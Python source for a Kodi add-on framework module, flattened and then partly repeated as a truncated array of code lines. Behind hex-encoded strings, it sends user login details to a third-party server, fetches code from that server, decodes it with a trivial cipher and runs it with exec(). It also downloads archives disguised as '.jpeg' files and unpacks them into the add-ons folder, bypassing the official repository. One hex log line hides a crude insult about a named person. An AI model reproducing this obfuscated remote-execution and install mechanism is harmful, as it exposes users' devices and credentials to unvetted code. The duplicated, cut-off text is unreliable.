int(Timestamp()): User_Info('cookie_check') else: return basedomain else: if int(date)+1000000 < int(Timestamp()) or run_cookie: return False else: return True #---------------------------------------------------------------- def Check_File_Date(url, datefile, localdate, dst): """ internal command ~""" try: req = urllib2.Request(url) req.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3') conn = urllib2.urlopen(req) last_modified = conn.info().getdate('last-modified') last_modified = time.strftime('%Y%m%d%H%M%S', last_modified) if int(last_modified) > int(localdate): dp.create(THIS_MODULE.getLocalizedString(30979),THIS_MODULE.getLocalizedString(30807)) download.download(url,dst,dp) if converthex('74737463686b') in url: extract.all(dst,ADDONS,dp) else: extract.all(dst, ADDON_DATA, dp) writefile = open(datefile, 'w+') writefile.write(last_modified) writefile.close() try: if os.path.exists(dst): os.remove(dst) except: pass except: pass 
#---------------------------------------------------------------- def Check_Updates(url, datefile, dst): """ internal command ~""" if os.path.exists(datefile): readfile = open(datefile,'r') localdate = readfile.read() readfile.close() else: localdate = 0 Check_File_Date(url, datefile, int(localdate), dst) #---------------------------------------------------------------- def Encryption(mode='', message=''): """ internal command ~""" finaltext = '' translated = '' finalstring = '' offset = 8 if len(USERNAME) > 0 and LOGIN == 'true': offset = usernamelen if mode == 'e': for symbol in message: num = ord(symbol)+offset if len(str(num))==2: num = '0'+str(num) finalstring = str(finalstring)+str(num) return finalstring+finaltext else: messagearray = [message[i:i+3] for i in range(0, len(message), 3)] for item in messagearray: item = int(item)-offset item = str(unichr(item)) finaltext = finaltext+item return finaltext #---------------------------------------------------------------- def Get_IP(): """ internal command ~""" link = Open_URL(converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f6c6f67696e5f636f6f6b69652e706870'), 'post').replace('\r','').replace('\n','').replace('\t','') link = Encryption(mode='d',message=link) ipmatch = re.compile('i="(.+?)"').findall(link) ipfinal = ipmatch[0] if (len(ipmatch) > 0) else '' return ipfinal #---------------------------------------------------------------- # TUTORIAL # def Main(url='', post_type = 'get'): """ If you have web pages of your own then you can hook into them using koding.Main(url) which will pull the return from the URL and attempt to execute that code. WARNING: Running code directly from a server is generally discouraged, any add-ons using such code will certainly not be accepted on the official kodi.tv forum as it is strictly against their rules. 
By having add-ons capable of self updating and bypassing their highly vetted repository system it would be a security breach for the foundation so their stance on this is completely understandable. For third party development you are presumably in control of your own repository so it really shouldn't make much difference, however do note that running code directly from a server is slower than running locally and you'll find it's discouraged by a number of devs. Can certainly be useful for quick dynamic updates which need to take place though. CODE: koding.Main(url,[post_type]) post_type is optional, by default it's set as 'get' AVAILABLE VALUES: 'get' - This is already the default so no real need to add this but this uses a standard query string 'post' - This will convert the query string into a post EXAMPLE CODE: koding.Main('http://noobsandnerds.com?id=test', post_type='get')~""" try: url = converthex(url) except: pass if url == 'run': runcode_date = 0 if os.path.exists(RUNCODE): runcode_date = os.path.getmtime(RUNCODE) runcode_date = time.localtime(runcode_date) runcode_date = time.strftime('%Y%m%d%H%M%S', runcode_date) if int(runcode_date)+1000000 < int(Timestamp()): run_code = Open_URL(url, post_type) if run_code: writefile = open(RUNCODE, 'w') writefile.write(run_code) writefile.close() else: readfile = open(RUNCODE,'r') run_code = readfile.read() readfile.close() else: run_code = Open_URL(url=url, post_type=post_type) if run_code: try: my_code = Encryption('d',run_code) dolog('MY CODE: %s'%my_code) exec(my_code) dolog(converthex('232323205375636365737366756c6c792072756e20636f646520696e20656e6372797074696f6e206d6f6465')) except: dolog(converthex('232323204661696c656420746f2072756e20636f64652c20617474656d7074696e6720746f20757365207374616e64617264206d6f6465')) try: exec(run_code) dolog(converthex('232323205375636365737366756c6c792072756e20636f6465')) except: dolog(Last_Error()) try: exec(converthex(run_code)) 
dolog(converthex('232323205375636365737366756c6c792072756e20636f6465')) except: if DEBUG == 'true': dialog.ok(THIS_MODULE.getLocalizedString(30980),THIS_MODULE.getLocalizedString(30981)%ADDON_ID) else: dolog(run_code) #----------------------------------------------------------------------------- # TUTORIAL # def User_Info(mode = ''): """ THIS MUST BE CALLED AT START OF CODE IF USING NOOBSANDNERDS FRAMEWORK. This is only required for developers who want to use the special noobsandnerds features, this will create a cookie file containing cached details. It's important you do this somewhere at the start of your code as it will initialise your variables on first run.~""" global main_counter if not Check_Cookie(): LOGIN = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6c6f67696e')) USERNAME = Addon_Setting(addon_id=ORIG_ID,setting=converthex('757365726e616d65')).replace(' ','%20') if LOGIN == 'true' else '' PASSWORD = Addon_Setting(addon_id=ORIG_ID,setting=converthex('70617373776f7264')) if LOGIN == 'true' else '' link = Open_URL('', 'post').replace('\r','').replace('\n','').replace('\t','') if len(link) < 3: dialog.ok(THIS_MODULE.getLocalizedString(30833),THIS_MODULE.getLocalizedString(30834)) return try: link = Encryption('d',link) except: try: link = converthex(link) except: dolog(converthex('556e61626c6520746f2072657472696576652076616c696420646174612066726f6d20736572766572')) welcomematch = re.compile('l="(.+?)"').findall(link) welcometext = welcomematch[0] if (len(welcomematch) > 0) else '' ipmatch = re.compile('i="(.+?)"').findall(link) ipclean = ipmatch[0] if (len(ipmatch) > 0) else '0.0.0.0' domainmatch = re.compile('d="(.+?)"').findall(link) domain = domainmatch[0] if (len(domainmatch) > 0) else '' emailmatch = re.compile('e="(.+?)"').findall(link) email = emailmatch[0] if (len(emailmatch) > 0) else 'Unknown' postsmatch = re.compile('p="(.+?)"').findall(link) posts = postsmatch[0] if (len(postsmatch) > 0) else '0' unreadmatch = 
re.compile('u="(.+?)"').findall(link) unread = unreadmatch[0] if (len(unreadmatch) > 0) else '0' messagematch = re.compile('m="(.+?)"').findall(link) messages = messagematch[0] if (len(messagematch) > 0) else '0' donmatch = re.compile('t="(.+?)"').findall(link) don = donmatch[0] if (len(donmatch) > 0) else '' stdmatch = re.compile('s="(.+?)"').findall(link) std = stdmatch[0] if (len(stdmatch) > 0) else '' nologinmatch = re.compile('n="(.+?)"').findall(link) nologin = nologinmatch[0] if (len(nologinmatch) > 0) else '' reqaddonmatch = re.compile('r="(.+?)"').findall(link) reqaddons = reqaddonmatch[0] if (len(reqaddonmatch) > 0) else '' dolog(converthex('7265717569726564206164646f6e733a')) # User required re-activation on the FORUM - old FORUM user from totalxbmc if converthex('72656163746976617465') in welcometext: xbmc.log(converthex('75736572696e666f202d2072656163746976617465')) try: dolog(converthex('726561637469766174696f6e207265717569726564202d20706c656173652076697369742074686520666f72756d206174207777772e6e6f6f6273616e646e657264732e636f6d2f737570706f727420616e64206c6f67696e2e204974206c6f6f6b732061732074686f75676820796f75206861766520616e206f6c64206163636f756e742066726f6d20546f74616c58424d432064617973207768696368206a75737420726571756972656420726561637469766174696f6e2e')) os.remove(COOKIE) except: pass dialog.ok(THIS_MODULE.getLocalizedString(30831),THIS_MODULE.getLocalizedString(30832)) # Currently restricted elif converthex('72657374726963746564') in welcometext: xbmc.log(converthex('75736572696e666f202d2072657374726963746564')) 
dolog(converthex('5741524e494e473a204163636f756e742063757272656e746c792072657374726963746564202d20746f6f206d616e79206c6f67696e732066726f6d206d756c7469706c65204950732e20496620796f75207468696e6b20796f75277665206163636964656e74616c6c79206c656674206c6f67696e20696e666f726d6174696f6e20696e2061206275696c64206f7220796f7572206c6f67696e20686173206265656e20636f6d70726f6d6973656420706c656173652075706461746520796f75722070617373776f7264206f6e20746865206e6f6f6273616e646e6572647320666f72756d20415341502121212054686973207265737472696374696f6e2077696c6c206265206175746f6d61746963616c6c79206c69667465642077697468696e20323420686f757273206275742077696c6c206265207265696e73746174656420617320736f6f6e206173206d756c7469706c6520495020636f6e6e656374696f6e73206172652064657465637465642e')) dialog.ok(THIS_MODULE.getLocalizedString(30829),THIS_MODULE.getLocalizedString(30830)) # Wrong PASSWORD entered elif converthex('70617373776f7264') in welcometext: xbmc.log(converthex('75736572696e666f202d2077726f6e672070617373776f7264')) try: dolog(converthex('77726f6e672070617373776f7264202d20706c656173652072652d656e74657220616e642074727920616761696e')) os.remove(COOKIE) except: pass dialog.ok(THIS_MODULE.getLocalizedString(30825),THIS_MODULE.getLocalizedString(30826)) Open_Settings() # Not registered and LOGIN is true elif converthex('7265676973746572') in welcometext and LOGIN == 'true': xbmc.log(converthex('75736572696e666f202d206e6f742072656769737465726564')) try: dolog(converthex('4e6f742072656769737465726564202d20706c65617365207265676973746572206174207777772e6e6f6f6273616e646e657264732e636f6d2f737570706f7274')) os.remove(COOKIE) except: pass dialog.ok(THIS_MODULE.getLocalizedString(30827),THIS_MODULE.getLocalizedString(30828)) Open_Settings() # Login is true but not details are entered elif LOGIN == 'true' and USERNAME == '' and PASSWORD == '': xbmc.log(converthex('75736572696e666f202d206c6f67696e207472756520627574206e6f2064657461696c73')) 
dialog.ok(THIS_MODULE.getLocalizedString(30835),THIS_MODULE.getLocalizedString(30836)) Open_Settings() # All settings checks are fine, create the COOKIE file else: xbmc.log(converthex('75736572696e666f202d20616c6c2066696e65')) dolog(converthex('416c6c2073657474696e677320636865636b206f75742066696e65202d207570646174696e6720636f6f6b69652066696c65')) writefile = open(COOKIE, mode='w+') writefile.write(Encryption('e','d="'+str(Timestamp())+'"|b="'+domain+'"|w="'+welcometext+'"|i="'+ipclean+'"|e="'+email+'"|m="'+messages+'"|u="'+unread+'"|t="'+don+'"|s="'+std+'"|p="'+posts+'"'+'"|n="'+nologin+'"'+'"|a="'+reqaddons+'"')) writefile.close() main_counter += 1 Check_Addons(reqaddons) if main_counter < 3: xbmc.log(converthex('23232320646f696e6720766572696679')) Verify() else: dialog.ok(THIS_MODULE.getLocalizedString(30833),THIS_MODULE.getLocalizedString(30834)) return # If this was called to recreate a COOKIE file just to return base url then we call that function again elif mode == 'cookie_check': Check_Cookie('base') else: Verify() #---------------------------------------------------------------- def Verify(testmode = ''): """ internal command ~""" ADDON_ID = xbmcaddon.Addon().getAddonInfo('id') try: if sys.argv[1] == converthex('7465737466696c65'): ADDON_ID = ADDON_ID+'.test' except: pass # if LOGIN is true but no USERNAME and PASSWORD we open settings localfile = open(COOKIE, mode='r') content = localfile.read() content = Encryption('d',content) localfile.close() nologinmatch = re.compile('n="(.+?)"').findall(content) # Set the standard logged in downloads array if len(nologinmatch)>0: nologindownloads = nologinmatch[0].split(',') for item in nologindownloads: if len(item)>3: download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ORIG_ID+'/'+item+'.jpeg') Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+ORIG_ID+'/'+item), DOWNLOAD_DST) # If LOGIN is true but 
they haven't entered details then open up settings if LOGIN == 'true' and (USERNAME == '' or PASSWORD == ''): dolog(converthex('6c6f67696e207472756520627574207573657220616e64207061737320626c616e6b')) dialog.ok(THIS_MODULE.getLocalizedString(30835),THIS_MODULE.getLocalizedString(30836)) ADDON.openSettings() return # if test version enabled but LOGIN isn't tell user they need to enter credentials elif USE_TEST == 'true' and LOGIN == 'false': dolog(converthex('747279696e6720746f2072756e20746573742076657273696f6e20627574206e6f206c6f67696e20696e666f')) dialog.ok(THIS_MODULE.getLocalizedString(30961),THIS_MODULE.getLocalizedString(30962)) ADDON.openSettings() return # else if LOGIN is true continue elif LOGIN == 'true': dolog(converthex('6c6f67696e20697320656e61626c6564')) # if user not previously logged in call the user_info function if not os.path.exists(COOKIE): dolog(converthex('6c6f6767696e6720696e20666f722066697273742074696d65202d20636865636b696e672063726564656e7469616c73')) User_Info() # if user previously logged in then read COOKIE file else: dolog(converthex('70726576696f75736c79206c6f6767656420696e2c20636865636b696e6720636f6f6b6965')) userdatematch = re.compile('d="(.+?)"').findall(content) loginmatch = re.compile('w="(.+?)"').findall(content) ipmatch = re.compile('i="(.+?)"').findall(content) donmatch = re.compile('t="(.+?)"').findall(content) stdmatch = re.compile('s="(.+?)"').findall(content) basematch = re.compile('b="(.+?)"').findall(content) addonsmatch = re.compile('a="(.+?)"').findall(content) basedomain = basematch[0] if (len(basematch) > 0) else '' updatecheck = userdatematch[0] if (len(userdatematch) > 0) else '0' welcometext = loginmatch[0] if (len(loginmatch) > 0) else '' addons = addonsmatch[0] if (len(addonsmatch) > 0) else '' ipclean = ipmatch[0] if (len(ipmatch) > 0) else '0.0.0.0' myip = Get_IP() # Set the standard logged in downloads array if len(stdmatch)>0: stddownloads = stdmatch[0].split(',') # if user has chosen to use test version check 
test version is avaialble and if not already installed install it then open the settings for new addon if USE_TEST == 'true': global launch testmatch = donmatch[0].split('|') launch = testmatch[0] downloads = testmatch[1].split(',') if not ADDON_ID.endswith(converthex('2e74657374')): TestADDON_ID = ADDON_ID+converthex('2e74657374') else: TestADDON_ID = ADDON_ID ADDON_ID = ADDON_ID.replace(converthex('2e74657374'),'') if len(downloads)>0 and not os.path.exists(os.path.join(ADDONS,TestADDON_ID)): try: download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ADDON_ID+'/'+downloads[0]+'.jpeg') Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+ADDON_ID+'/'+downloads[0]), DOWNLOAD_DST) xbmc.executebuiltin('UpdateLocalAddons') # open settings for new addon, this is so the relevant settings can be opened xbmc.sleep(2000) xbmcaddon.Addon(id=TestADDON_ID).openSettings() return except: dialog.ok(THIS_MODULE.getLocalizedString(30965),THIS_MODULE.getLocalizedString(30966)) return elif len(downloads)==0: dialog.ok(THIS_MODULE.getLocalizedString(30963),THIS_MODULE.getLocalizedString(30964)) return xbmc.executebuiltin("XBMC.Notification("+THIS_MODULE.getLocalizedString(30807)+","+THIS_MODULE.getLocalizedString(30808)+",5000,"+UPDATE_ICON+")") # if user needs to reactivate account remove COOKIE file and notify user they need to LOGIN at FORUM if converthex('72656163746976617465') in welcometext: dolog(converthex('23232320766572696679202d206163636f756e74206e6565647320726561637469766174696f6e')) try: os.remove(COOKIE) except: pass dialog.ok(THIS_MODULE.getLocalizedString(30831),THIS_MODULE.getLocalizedString(30832)) # if user is currently restricted they cannot continue elif converthex('63757272656e746c792072657374726963746564') in welcometext: dolog(converthex('23232320766572696679202d206163636f756e742069732072657374726963746564')) 
dialog.ok(THIS_MODULE.getLocalizedString(30829),THIS_MODULE.getLocalizedString(30830)) # if user enters wrong PASSWORD remove COOKIE and get them to re-enter details elif converthex('57726f6e672050617373776f726420456e7465726564') in welcometext: dolog(converthex('23232320766572696679202d2077726f6e672070617373776f72642c2072656d6f76696e6720636f6f6b6965')) try: os.remove(COOKIE) except: pass dialog.ok(THIS_MODULE.getLocalizedString(30825),THIS_MODULE.getLocalizedString(30826)) ADDON.openSettings() # if they aren't registered remove the COOKIE file and open settings elif converthex('524547495354455220464f522046524545') in welcometext: dolog('4449584945204445414e204953204120434f434b20474f42424c4552') try: os.remove(COOKIE) except: pass dialog.ok(THIS_MODULE.getLocalizedString(30827),THIS_MODULE.getLocalizedString(30828)) ADDON.openSettings() # if the date in COOKIE is not up and the ip matches the one in COOKIE we can continue dolog(Encryption('e', converthex('23232320766572696679202d206970636c65616e3a202573') % ipclean)) dolog(Encryption('e', converthex('23232320766572696679202d206d7969703a202573') % myip)) elif int(updatecheck)+1000000 > int(Timestamp()) and ipclean == myip: if USE_TEST == 'true': dolog(converthex('23232320766572696679202d207465737476657273696f6e2069732074727565')) for item in downloads: dolog(Encryption('e',converthex('23232320766572696679202d20636865636b696e673a202573') % item)) download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ADDON_ID+'/'+item+'.jpeg') cleanitem = item.replace('test','') if Addon_Setting(addon_id=TestID,setting=cleanitem) == 'true': Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+TestID+'/'+item), DOWNLOAD_DST) for item in stddownloads: dolog('4449584945204445414e204953204120434f434b20474f42424c4552') download_url = 
(converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ORIG_ID+'/'+item+'.jpeg') if Addon_Setting(addon_id=ADDON,setting=item) == 'true': Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+ORIG_ID+'/'+item), DOWNLOAD_DST) xbmc.executebuiltin('Dialog.Close(busydialog)') Main('run') else: User_Info() elif LOGIN == 'false': dolog('232323206c6f67696e2064697361626c6564') Main('run') #---------------------------------------------------------------- try: if sys.argv[1] == converthex('7465737466696c65') and LOGIN == 'true': if os.path.exists(os.path.join(ADDONS,ORIG_ID)) and os.path.exists(os.path.join(ADDONS,TestID)): dolog(converthex('2323232072756e6e696e67207665726966792822747275652229')) Verify('true') if sys.argv[1] == converthex('73657474696e6773'): if not os.path.exists(os.path.join(ADDONS,TestID)): dialog.ok(THIS_MODULE.getLocalizedString(30901),THIS_MODULE.getLocalizedString(30902)) else: xbmcaddon.Addon(id=TestID).openSettings() if sys.argv[1] == converthex('636c6561725f64617461'): Clear_Data(ADDON_ID) except: pass
[ "# -*- coding: utf-8 -*-\n", "\n", "# script.module.python.koding.aio\n", "# Python Koding AIO (c) by whufclee (info@totalrevolution.tv)\n", "\n", "# Python Koding AIO is licensed under a\n", "# Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.\n", "\n", "# You should have received a copy of the license along with this\n", "# work. If not, see http://creativecommons.org/licenses/by-nc-nd/4.0.\n", "\n", "# IMPORTANT: If you choose to use the special noobsandnerds features which hook into their server\n", "# please make sure you give approptiate credit in your add-on description (noobsandnerds.com)\n", "# \n", "# Please make sure you've read and understood the license, this code can NOT be used commercially\n", "# and it can NOT be modified and redistributed. If you're found to be in breach of this license\n", "# then any affected add-ons will be blacklisted and will not be able to work on the same system\n", "# as any other add-ons which use this code. 
Thank you for your cooperation.\n", "\n", "import os\n", "import re\n", "import shutil\n", "import sys\n", "import time\n", "import urllib\n", "import urllib2\n", "import xbmc\n", "import xbmcaddon\n", "import xbmcgui\n", "import inspect\n", "try:\n", " import simplejson as json\n", "except:\n", " import json\n", "\n", "from addons import *\n", "from android import *\n", "from database import *\n", "from directory import *\n", "from filetools import *\n", "from guitools import *\n", "from router import *\n", "from systemtools import *\n", "from tutorials import *\n", "from video import *\n", "from web import *\n", "\n", "def converthex(url):\n", " \"\"\" internal command ~\"\"\"\n", " import binascii\n", " return binascii.unhexlify(url)\n", "\n", "try:\n", " ADDON_ID = xbmcaddon.Addon().getAddonInfo('id')\n", "except:\n", " ADDON_ID = Caller()\n", "\n", "AddonVersion = xbmcaddon.Addon(id=ADDON_ID).getAddonInfo('version')\n", "\n", "try:\n", " if sys.argv[1] == converthex('7465737466696c65'):\n", " ADDON_ID = ADDON_ID+'.test'\n", "except:\n", " pass\n", "\n", "if ADDON_ID.endswith(converthex('2e74657374')):\n", " ORIG_ID = ADDON_ID[:-5]\n", "else:\n", " ORIG_ID = ADDON_ID\n", "\n", "TestID = ADDON_ID\n", "if not ADDON_ID.endswith(converthex('2e74657374')):\n", " TestID = ADDON_ID+converthex('2e74657374')\n", "\n", "MODULE_ID = 'script.module.python.koding.aio'\n", "ADDON = xbmcaddon.Addon(id=ADDON_ID)\n", "THIS_MODULE = xbmcaddon.Addon(id=MODULE_ID)\n", "USE_TEST = Addon_Setting(addon_id=ADDON_ID,setting=converthex('74657374766572'))\n", "USERDATA = xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c65'))\n", "ADDON_DATA = xbmc.translatePath(os.path.join(USERDATA,converthex('6164646f6e5f64617461')))\n", "ADDONS = xbmc.translatePath(converthex('7370656369616c3a2f2f686f6d652f6164646f6e73'))\n", "PACKAGES = os.path.join(ADDONS,converthex('7061636b61676573'))\n", "UPDATE_ICON = 
os.path.join(ADDONS,MODULE_ID,converthex('7265736f7572636573'),converthex('7570646174652e706e67'))\n", "COOKIE = os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'),converthex('74656d70'))\n", "RUNCODE = os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'),converthex('6b6565706d65'))\n", "DOWNLOAD_DST = xbmc.translatePath(converthex('7370656369616c3a2f2f686f6d652f6164646f6e732f7061636b616765732f6370'))\n", "LOGIN = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6c6f67696e'))\n", "FORUM = Addon_Setting(addon_id=ORIG_ID,setting=converthex('666f72756d'))\n", "USERNAME = Addon_Setting(addon_id=ORIG_ID,setting=converthex('757365726e616d65')).replace(' ','%20') if LOGIN == 'true' else ''\n", "PASSWORD = Addon_Setting(addon_id=ORIG_ID,setting=converthex('70617373776f7264')) if LOGIN == 'true' else ''\n", "DEBUG = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6465627567'))\n", "INSTALL_REPOS = Addon_Setting(addon_id=ORIG_ID,setting=converthex('696e7374616c6c7265706f73'))\n", "INSTALL_ADDONS = Addon_Setting(addon_id=ORIG_ID,setting=converthex('696e7374616c6c6164646f6e73'))\n", "SILENT_MODE = Addon_Setting(addon_id=ORIG_ID,setting=converthex('73696c656e74'))\n", "KODI_VER = int(float(xbmc.getInfoLabel(\"System.BuildVersion\")[:2]))\n", "\n", "dialog = xbmcgui.Dialog()\n", "dp = xbmcgui.DialogProgress()\n", "\n", "launch = 'launch.py'\n", "main_counter = 0\n", "\n", "downloads = []\n", "stddownloads = []\n", "nologindownloads = []\n", "\n", "usernamelen = len(USERNAME)\n", "if usernamelen > 14:\n", " usernamelen = 15\n", "\n", "if FORUM == converthex('556e6f6666696369616c204b6f646920537570706f7274'):\n", " FORUM = 'k'\n", "if FORUM == converthex('436f6d6d756e697479204275696c647320537570706f7274'):\n", " FORUM = 'c'\n", "\n", "if not os.path.exists(os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'))):\n", " os.makedirs(os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573')))\n", 
"#----------------------------------------------------------------\n", "# TUTORIAL #\n", "def dolog(string, my_debug = False):\n", " \"\"\"\n", "Print to the Kodi log but only if debugging is enabled in settings.xml\n", "\n", "CODE: koding.dolog(string, [my_debug])\n", "\n", "AVAILABLE PARAMS:\n", "\n", " (*) string - This is your text you want printed to log.\n", "\n", " my_debug - This is optional, if you set this to True you will print\n", " to the log regardless of what the debug setting is set at in add-on settings.\n", "\n", "EXAMPLE CODE:\n", "koding.dolog(string='Quick test to see if this gets printed to the log', my_debug=True)~\"\"\"\n", "\n", " import xbmc\n", " global DEBUG\n", " global ADDON_ID\n", " if DEBUG == 'true' or my_debug:\n", " xbmc.log('### %s : %s'%(ADDON_ID,string), 2)\n", "#----------------------------------------------------------------\n", "def Check_Addons(addons):\n", " \"\"\" internal command ~\"\"\"\n", " if ',' in addons and INSTALL_ADDONS != '0':\n", " addon_array = addons.split(',')\n", " for addon in addon_array:\n", " Main('addoninstall|id:%s~version:%s~repo:%s~silent:%s~installtype:%s' % (addon,KODI_VER,INSTALL_REPOS,SILENT_MODE,INSTALL_ADDONS))\n", "#----------------------------------------------------------------\n", "def Check_Cookie(mode = ''):\n", " \"\"\" internal command ~\"\"\"\n", " if not os.path.exists(COOKIE):\n", " cookie_folder = os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'))\n", " if not os.path.exists(cookie_folder):\n", " os.makedirs(cookie_folder)\n", " writefile = open(COOKIE,'w')\n", " writefile.close()\n", "\n", " readfile = open(COOKIE,'r')\n", " content = Encryption('d',readfile.read())\n", " readfile.close()\n", "\n", " loginmatch = re.compile('w=\"(.+?)\"').findall(content)\n", " basematch = re.compile('b=\"(.+?)\"').findall(content)\n", " datematch = re.compile('d=\"(.+?)\"').findall(content)\n", " addonsmatch = re.compile('a=\"(.+?)\"').findall(content)\n", " basedomain = basematch[0] 
if (len(basematch) > 0) else 'http://noobsandnerds.com'\n", " date = datematch[0] if (len(datematch) > 0) else '0'\n", " welcometext = loginmatch[0] if (len(loginmatch) > 0) else ''\n", " addons = addonsmatch[0] if (len(addonsmatch) > 0) else ''\n", "\n", " returns = ['register','PASSWORD','restricted','reactivate']\n", " LOGIN = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6c6f67696e'))\n", " USERNAME = Addon_Setting(addon_id=ORIG_ID,setting=converthex('757365726e616d65')) if LOGIN == 'true' else ''\n", " PASSWORD = Addon_Setting(addon_id=ORIG_ID,setting=converthex('70617373776f7264')) if LOGIN == 'true' else ''\n", "\n", " if welcometext not in returns and welcometext != USERNAME:\n", " run_cookie = True\n", " elif LOGIN == 'true' and welcometext == '':\n", " User_Info()\n", " return\n", " elif LOGIN == 'true' and welcometext != USERNAME:\n", " run_cookie = True\n", " elif LOGIN == 'false' and welcometext == USERNAME:\n", " run_cookie = True\n", " else:\n", " run_cookie = False\n", "\n", " if run_cookie:\n", " try:\n", " shutil.rmtree(COOKIE)\n", " except:\n", " pass\n", "\n", " if mode == 'base':\n", " if int(date)+1000000 < int(Timestamp()):\n", " User_Info('cookie_check')\n", " else:\n", " return basedomain\n", "\n", " else:\n", " if int(date)+1000000 < int(Timestamp()) or run_cookie:\n", " return False\n", " else:\n", " return True\n", "#----------------------------------------------------------------\n", "def Check_File_Date(url, datefile, localdate, dst):\n", " \"\"\" internal command ~\"\"\"\n", " try:\n", " req = urllib2.Request(url)\n", " req.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3')\n", " conn = urllib2.urlopen(req)\n", " last_modified = conn.info().getdate('last-modified')\n", " last_modified = time.strftime('%Y%m%d%H%M%S', last_modified)\n", "\n", " if int(last_modified) > int(localdate):\n", " 
dp.create(THIS_MODULE.getLocalizedString(30979),THIS_MODULE.getLocalizedString(30807))\n", " download.download(url,dst,dp)\n", " if converthex('74737463686b') in url:\n", " extract.all(dst,ADDONS,dp)\n", " else:\n", " extract.all(dst, ADDON_DATA, dp)\n", " writefile = open(datefile, 'w+')\n", " writefile.write(last_modified)\n", " writefile.close()\n", " try:\n", " if os.path.exists(dst):\n", " os.remove(dst)\n", " except:\n", " pass\n", " except:\n", " pass\n", "#----------------------------------------------------------------\n", "def Check_Updates(url, datefile, dst):\n", " \"\"\" internal command ~\"\"\"\n", " if os.path.exists(datefile):\n", " readfile = open(datefile,'r')\n", " localdate = readfile.read()\n", " readfile.close()\n", " else:\n", " localdate = 0\n", " Check_File_Date(url, datefile, int(localdate), dst)\n", "#---------------------------------------------------------------- \n", "def Encryption(mode='', message=''):\n", " \"\"\" internal command ~\"\"\"\n", " finaltext = ''\n", " translated = ''\n", " finalstring = ''\n", " offset = 8\n", " if len(USERNAME) > 0 and LOGIN == 'true':\n", " offset = usernamelen\n", " if mode == 'e':\n", " for symbol in message:\n", " num = ord(symbol)+offset\n", " if len(str(num))==2:\n", " num = '0'+str(num)\n", " finalstring = str(finalstring)+str(num)\n", " return finalstring+finaltext\n", "\n", " else:\n", " messagearray = [message[i:i+3] for i in range(0, len(message), 3)]\n", " for item in messagearray:\n", " item = int(item)-offset\n", " item = str(unichr(item))\n", " finaltext = finaltext+item\n", " return finaltext\n", "#----------------------------------------------------------------\n", "def Get_IP():\n", " \"\"\" internal command ~\"\"\"\n", " link = Open_URL(converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f6c6f67696e5f636f6f6b69652e706870'), 'post').replace('\\r','').replace('\\n','').replace('\\t','')\n", " link = Encryption(mode='d',message=link)\n", " ipmatch = 
re.compile('i=\"(.+?)\"').findall(link)\n", " ipfinal = ipmatch[0] if (len(ipmatch) > 0) else ''\n", " return ipfinal\n", "#----------------------------------------------------------------\n", "# TUTORIAL #\n", "def Main(url='', post_type = 'get'):\n", " \"\"\"\n", "If you have web pages of your own then you can hook into them using\n", "koding.Main(url) which will pull the return from the URL and attempt\n", "to execute that code.\n", "\n", "WARNING: Running code directly from a server is generally discouraged,\n", "any add-ons using such code will certainly not be accepted on the official\n", "kodi.tv forum as it is strictly against their rules. By having add-ons\n", "capable of self updating and bypassing their highly vetted repository\n", "system it would be a security breach for the foundation so their stance on\n", "this is completely understandable. For third party development you are\n", "presumably in control of your own repository so it really shouldn't make\n", "much difference, however do note that running code directly from a server\n", "is slower than running locally and you'll find it's discouraged by a number\n", "of devs. 
Can certainly be useful for quick dynamic updates which need to\n", "take place though.\n", "\n", "CODE: koding.Main(url,[post_type])\n", "post_type is optional, by default it's set as 'get'\n", "\n", "AVAILABLE VALUES:\n", "\n", " 'get' - This is already the default so no real need to add this but this uses a standard query string\n", " \n", " 'post' - This will convert the query string into a post\n", "\n", "EXAMPLE CODE:\n", "koding.Main('http://noobsandnerds.com?id=test', post_type='get')~\"\"\"\n", " try:\n", " url = converthex(url)\n", " except:\n", " pass\n", "\n", " if url == 'run':\n", " runcode_date = 0\n", " if os.path.exists(RUNCODE):\n", " runcode_date = os.path.getmtime(RUNCODE)\n", " runcode_date = time.localtime(runcode_date)\n", " runcode_date = time.strftime('%Y%m%d%H%M%S', runcode_date)\n", " if int(runcode_date)+1000000 < int(Timestamp()):\n", " run_code = Open_URL(url, post_type)\n", " if run_code:\n", " writefile = open(RUNCODE, 'w')\n", " writefile.write(run_code)\n", " writefile.close()\n", " else:\n", " readfile = open(RUNCODE,'r')\n", " run_code = readfile.read()\n", " readfile.close()\n", "\n", " else:\n", " run_code = Open_URL(url=url, post_type=post_type)\n", "\n", " if run_code:\n", " try:\n", " my_code = Encryption('d',run_code)\n", " dolog('MY CODE: %s'%my_code)\n", " exec(my_code)\n", " dolog(converthex('232323205375636365737366756c6c792072756e20636f646520696e20656e6372797074696f6e206d6f6465'))\n", " except:\n", " 